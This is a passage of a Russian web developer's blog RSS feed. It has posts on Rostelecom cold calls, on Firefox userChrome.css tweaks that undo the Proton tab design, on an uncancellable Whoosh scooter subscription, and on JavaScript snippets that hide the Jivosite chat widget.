<p>Вроде отличное предложение и я уж  думал согласиться, но тут вспомнил&#8230; На квартире на которой я живу уже 6 лет у меня интернет от Дом.ру. Начал вспоминать какой интернет был на предыдущей квартире и вспомнил что и там у меня был Дом.ру, а не Ростелеком. В итоге вспомнил что Ростелеком был у меня наверно лет 15 назад, на какой то из квартир. Но самое смешное, что и там у меня стоял не ростелекомовский роутер.  Тот сдох и на замену ему был куплен какой то Дилинк.</p>
<p>Т.е. эти дятлы прозванивают по абсолютно не актуальной базе. 15 лет если не больше&#8230; Все что нужно знать об эффективности госкомпаний.</p>
<p>&nbsp;</p><p>The post <a href="https://fstrange.ru/coder/about_all/rostelekom-zamenit-router.html">Ростелеком заменить роутер на новый</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://fstrange.ru/coder/about_all/rostelekom-zamenit-router.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Firefox вернуть дизайн и отключить UI Proton</title>
		<link>https://fstrange.ru/coder/programs-to-work/firefox-remove-proton.html</link>
					<comments>https://fstrange.ru/coder/programs-to-work/firefox-remove-proton.html#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Thu, 12 Aug 2021 22:26:19 +0000</pubDate>
				<category><![CDATA[программы для работы]]></category>
		<category><![CDATA[firefox]]></category>
		<guid isPermaLink="false">https://fstrange.ru/coder/?p=970</guid>

					<description><![CDATA[<p>После очередного обновления Firefox приходится снова матерится. Интерфейс Proton. Абсолютно идиотский дизайн вкладок. Гигантские размеры, убрали разделитель между неактивными вкладками и куча других подарков. Если в первый раз все можно было вернуть &#171;взад&#187; через&#46;&#46;&#46;</p>
<p>The post <a href="https://fstrange.ru/coder/programs-to-work/firefox-remove-proton.html">Firefox вернуть дизайн и отключить UI Proton</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></description>
										<content:encoded><![CDATA[<p>После очередного обновления Firefox приходится снова матерится. Интерфейс Proton. Абсолютно идиотский дизайн вкладок. Гигантские размеры, убрали разделитель между неактивными вкладками и куча других подарков.</p>
<p>Если в первый раз все можно было вернуть &#171;взад&#187; через about:config опцией <strong>browser.proton.enabled</strong> и другими опциями browser.proton&#8230;. выставив false , то в этот раз уже никак.</p>
<p>Погуглив нашел сразу <a href="https://github.com/black7375/Firefox-UI-Fix/">сборник с инструкциями и готовыми стилями</a> под старый дизайн с исправлением вкладок и меню. Я поставил этот пак, а потом уже подправил под себя.</p>
<h2>Как изменить высоту вкладок?</h2>
<p>Высота вкладок для меня все равно велика. Поэтому лезем и ищем файл userChrome.css . Он находится в профиле Firefox в папке chrome.</p>
<p>Пробовал разную высоту, но для меня оптимально где то 28px. Опция &#8212;tab-min-height. Добавляем.</p><pre class="crayon-plain-tag">:root {
    --tab-min-height:  28px !important;
    --tabs-shadow-size: 0px !important;
    --tab-border-radius: 4px 1px !important;
  }</pre><p><img loading="lazy" class="alignnone size-full wp-image-971" src="https://fstrange.ru/coder/wp-content/uploads/2021/08/ff_proton_tab.png" alt="" width="371" height="77" srcset="https://fstrange.ru/coder/wp-content/uploads/2021/08/ff_proton_tab.png 371w, https://fstrange.ru/coder/wp-content/uploads/2021/08/ff_proton_tab-300x62.png 300w" sizes="(max-width: 371px) 100vw, 371px" /></p>
<h2>Как изменить размер кнопки &#171;закрыть&#187;?</h2>
<p>Это проблема номер 2. Зачем дизайнеры увеличили размер этой кнопки для меня загадка, но я стал чаще попадать по ней случайно и вместо выбора нужной вкладки, она закрывалась.</p>
<p>Во все тот же userChrome.css добавляем</p><pre class="crayon-plain-tag">.tab-close-button{
margin-inline-start: -2px !important;
width: 15px !important;
height: 15px !important;
padding: 3px !important; 
margin-inline-end:-6px !important
}</pre><p>Новый размер кнопок уже не так мешает. На рисунке выше видно как она выглядит и активную область. Если до, она занимала где то треть пространства вкладки, то ниже уже существенно поменьше.</p>
<p>И не забываем после каждого изменения userChrome.css набрать в url  &#8212; about:support , а затем нажать &#171;очистить кеш запуска&#187;. Firefox после этого перегружается и применяет наши изменения в стиле.</p><p>The post <a href="https://fstrange.ru/coder/programs-to-work/firefox-remove-proton.html">Firefox вернуть дизайн и отключить UI Proton</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://fstrange.ru/coder/programs-to-work/firefox-remove-proton.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Whoosh &#8212; как отменить бесплатную подписку?</title>
		<link>https://fstrange.ru/coder/about_all/whoosh-kak-otmenit-besplatnuyu-podpisku.html</link>
					<comments>https://fstrange.ru/coder/about_all/whoosh-kak-otmenit-besplatnuyu-podpisku.html#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Thu, 12 Aug 2021 18:39:20 +0000</pubDate>
				<category><![CDATA[обо всем]]></category>
		<guid isPermaLink="false">https://fstrange.ru/coder/?p=964</guid>

					<description><![CDATA[<p>Ответ вкратце. А никак не отменить! А теперь подробнее. Прилетело мне уведомление в приложении Whoosh (это сервис шеринга самокатов), что мне активирована бесплатная подписка. Фокусы с бесплатными подписками, я помню еще со времен wap&#46;&#46;&#46;</p>
<p>The post <a href="https://fstrange.ru/coder/about_all/whoosh-kak-otmenit-besplatnuyu-podpisku.html">Whoosh — как отменить бесплатную подписку?</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></description>
										<content:encoded><![CDATA[<p>Ответ вкратце. <strong>А никак не отменить!</strong></p>
<p>А теперь подробнее. Прилетело мне уведомление в приложении Whoosh (это сервис шеринга самокатов), что мне активирована бесплатная подписка. Фокусы с бесплатными подписками, я помню еще со времен wap сайтов и всяких подарков от опсосов, поэтому насторожился и обнюхал со всех сторон. Убрать не смог, но нашел галочку которая отключает продление. Продление отключил, но осадочек остался&#8230;</p>
<p>Даже с отключенной галочкой напрягает , ну да ладно, я вроде опытный юзер и денежка небольшая. Раз она на неделю, то через неделю, то я смогу удалить, как закончится?</p>
<p>Прошла неделя&#8230; Подписка от whoosh кончилась, денег не потребовали, галочка работает. Но, тот же вопрос, как удалить?</p>
<p><img loading="lazy" class="alignnone size-full wp-image-965" src="https://fstrange.ru/coder/wp-content/uploads/2021/08/whoosh_podpiska.png" alt="whoosh_podpiska" width="221" height="320" srcset="https://fstrange.ru/coder/wp-content/uploads/2021/08/whoosh_podpiska.png 221w, https://fstrange.ru/coder/wp-content/uploads/2021/08/whoosh_podpiska-207x300.png 207w" sizes="(max-width: 221px) 100vw, 221px" /></p>
<p>В менюшке приложения даже сам пункт выглядит отвратительно, вот это &#171;вкл&#187;, которое то ли означает состояние, то ли кнопка, которая активируется при нажатии меню&#8230; Какой маркетолух на пару с дизайнером это придумал?</p>
<p>Ну и завершающий звоночек, прилетел в почту. Чек о том, что бесплатная услуга полученная в подарок, оплачена. Нет нет, денег с меня не списано, но выглядит это именно так.</p>
<p><img loading="lazy" class="alignnone size-full wp-image-967" src="https://fstrange.ru/coder/wp-content/uploads/2021/08/whoosh_podpiska2.png" alt="whoosh подписка чек" width="327" height="574" srcset="https://fstrange.ru/coder/wp-content/uploads/2021/08/whoosh_podpiska2.png 327w, https://fstrange.ru/coder/wp-content/uploads/2021/08/whoosh_podpiska2-171x300.png 171w" sizes="(max-width: 327px) 100vw, 327px" /></p>
<p>В итоге, я жму &#171;удалить аккаунт&#187;. Приложение с правами на оплату, подписывающее на телефоне на бесплатные услуги и потом не дающее возможности ее удалить, мне не нужно.</p>
<p>Но и тут не все просто.</p>
<p><img loading="lazy" class="alignnone size-full wp-image-968" src="https://fstrange.ru/coder/wp-content/uploads/2021/08/whoosh_delete.png" alt="whoosh delete" width="277" height="480" srcset="https://fstrange.ru/coder/wp-content/uploads/2021/08/whoosh_delete.png 277w, https://fstrange.ru/coder/wp-content/uploads/2021/08/whoosh_delete-173x300.png 173w" sizes="(max-width: 277px) 100vw, 277px" /></p>
<p>&#171;Удалить профиль можно только через 15 дней после поездки&#187; . Я отлично понимаю почему это, но для меня это последняя капля. Это повод, чтобы как пройдет еще неделя, наконец удалить акк и больше никогда к Whoosh не возвращаться. Доверие утрачено. Благо конкурентов хватает. Выпишите премию талантливым маркетолухам!</p><p>The post <a href="https://fstrange.ru/coder/about_all/whoosh-kak-otmenit-besplatnuyu-podpisku.html">Whoosh — как отменить бесплатную подписку?</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://fstrange.ru/coder/about_all/whoosh-kak-otmenit-besplatnuyu-podpisku.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Как отключить jivosite через js</title>
		<link>https://fstrange.ru/coder/js/kak-otklyuchit-jivosite-cherez-js.html</link>
					<comments>https://fstrange.ru/coder/js/kak-otklyuchit-jivosite-cherez-js.html#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Mon, 23 Mar 2020 23:05:59 +0000</pubDate>
				<category><![CDATA[js]]></category>
		<category><![CDATA[javascript]]></category>
		<guid isPermaLink="false">https://fstrange.ru/coder/?p=945</guid>

					<description><![CDATA[<p>При вебразработке всплывающее окно от Jivosite мешает адски. Есть простой способ закрыть его джаваскриптом. Либо через вебконсоль, либо скриптом после загрузки jquery и самого Jivosite [crayon-6a78ca78523dc273698652/] [crayon-6a78ca78523e1404837341/]</p>
<p>The post <a href="https://fstrange.ru/coder/js/kak-otklyuchit-jivosite-cherez-js.html">Как отключить jivosite через js</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></description>
										<content:encoded><![CDATA[<p>При вебразработке всплывающее окно от Jivosite мешает адски.</p>
<p>Есть простой способ закрыть его джаваскриптом. Либо через вебконсоль, либо скриптом после загрузки jquery и самого Jivosite</p><pre class="crayon-plain-tag">jQuery("#jivo-iframe-container").remove();</pre><p></p><pre class="crayon-plain-tag">var targets = document.querySelectorAll("jdiv");
for (var i = 0; i &lt; targets.length; i++) {
  targets[i].style.display = "none"; 
}</pre><p></p><p>The post <a href="https://fstrange.ru/coder/js/kak-otklyuchit-jivosite-cherez-js.html">Как отключить jivosite через js</a> first appeared on <a href="https://fstrange.ru/coder">Записки веб разработчика fStrange</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://fstrange.ru/coder/js/kak-otklyuchit-jivosite-cherez-js.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
